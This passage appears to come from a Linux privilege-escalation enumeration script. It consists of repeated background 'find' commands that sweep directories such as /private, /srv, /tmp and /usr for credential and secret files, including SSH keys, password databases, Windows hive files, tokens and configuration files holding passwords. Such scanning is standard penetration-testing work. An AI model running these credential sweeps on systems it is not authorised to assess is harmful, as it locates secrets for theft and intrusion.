\"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"agent*\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name 